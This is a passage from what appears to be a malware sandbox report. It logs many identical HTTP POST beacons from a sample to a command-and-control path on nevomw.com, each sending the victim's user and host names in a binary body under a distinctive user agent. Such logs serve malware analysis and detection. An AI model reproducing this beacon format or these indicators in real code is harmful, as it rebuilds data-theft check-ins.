                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:17.207006931 CET1635OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:17.282335043 CET1636INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            205192.168.2.64995545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:17.509660959 CET1637OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:17.562423944 CET1637OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:17.634665966 CET1637INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            206192.168.2.64995645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:17.931638002 CET1638OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:17.984682083 CET1638OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:18.084548950 CET1639INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            207192.168.2.64995745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:18.320179939 CET1639OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:18.373460054 CET1640OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:18.450665951 CET1640INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            208192.168.2.64995845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:18.788388968 CET1641OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:18.841100931 CET1641OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:18.917300940 CET1642INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            209192.168.2.64995945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:19.241028070 CET1643OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:19.293788910 CET1643OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:19.373668909 CET1643INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            21192.168.2.64973445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:51.988950968 CET101OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:52.041430950 CET101OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:52.132110119 CET101INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            210192.168.2.64996045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:19.628892899 CET1644OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:19.683029890 CET1644OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:19.758888006 CET1645INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            211192.168.2.64996145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:20.012145042 CET1646OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:20.064877987 CET1646OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:20.137866020 CET1646INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            212192.168.2.64996245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:20.474217892 CET1647OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:20.527012110 CET1647OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:20.612632036 CET1648INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            213192.168.2.64996345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:20.865487099 CET1648OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:20.920099020 CET1649OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:20.993083000 CET1649INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            214192.168.2.64996445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:21.251329899 CET1650OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:21.302613020 CET1650OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:21.376930952 CET1651INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            215192.168.2.64996545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:21.612720013 CET1651OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:21.665374041 CET1652OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:21.738056898 CET1652INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            216192.168.2.64996645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:21.993889093 CET1653OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:22.045826912 CET1653OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:22.123760939 CET1653INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            217192.168.2.64996745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:22.405112982 CET1654OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:22.467976093 CET1655OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:22.542134047 CET1655INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            218192.168.2.64996845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:22.819144964 CET1656OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:22.871330023 CET1656OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:22.944391966 CET1656INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            219192.168.2.64996945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:23.191459894 CET1657OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:23.244364023 CET1658OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:23.319731951 CET1658INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            22192.168.2.64973545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:52.491063118 CET108OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:52.544442892 CET108OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:52.618566990 CET120INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            220192.168.2.64997045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:23.600042105 CET1659OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:23.653995037 CET1659OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:23.739670992 CET1659INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            221192.168.2.64997145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:24.003742933 CET1660OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
